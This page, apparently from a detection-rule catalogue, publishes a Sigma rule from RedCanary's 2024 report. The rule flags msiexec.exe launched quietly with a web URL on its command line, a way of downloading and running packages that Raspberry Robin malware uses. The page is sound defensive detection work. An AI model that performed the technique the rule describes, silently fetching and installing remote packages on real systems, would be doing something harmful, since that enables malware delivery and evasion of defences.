Windows Installer (msiexec.exe) Downloading and Executing Packages

calendar Mar 26, 2024 · attack.defense_evasion attack.t1218 attack.t1218.007  ·
Share on: linkedin copy

To detect suspicious use of msiexec.exe by Raspberry Robin or other threats, it’s essential to take a look at the command line and the URL. Detecting msiexec.exe making outbound network connections to download and install packages in the command-line interface will give you the opportunity to examine the activity and determine if it’s malicious or not. Part of the RedCanary 2024 Threat Detection Report.

Sigma rule (View on GitHub)

 1title: Windows Installer (msiexec.exe) Downloading and Executing Packages
 2id: 2b09f558-14dc-40ac-b962-66386b5785c1
 3status: experimental
 4description: |
 5    To detect suspicious use of msiexec.exe by Raspberry Robin or other threats, 
 6    it’s essential to take a look at the command line and the URL. Detecting 
 7    msiexec.exe making outbound network connections to download and install packages 
 8    in the command-line interface will give you the opportunity to examine the 
 9    activity and determine if it’s malicious or not. Part of the RedCanary 2024 
10    Threat Detection Report.    
11references:
12    - https://redcanary.com/threat-detection-report/threats/raspberry-robin/
13author: RedCanary, Sigma formatting by Micah Babinski
14date: 2024/03/21
15tags:
16    - attack.defense_evasion
17    - attack.t1218
18    - attack.t1218.007
19logsource:
20    category: process_creation
21    product: windows
22detection:
23    selection1:
24        Image|endswith: '\msiexec'
25    selection2:
26        CommandLine|contains:
27            - 'http:'
28            - 'https:'
29    selection3:
30        CommandLine|contains|windash: '/q'
31    condition: all of selection*
32falsepositives:
33    - Unknown
34level: low```

References

Related rules

to-top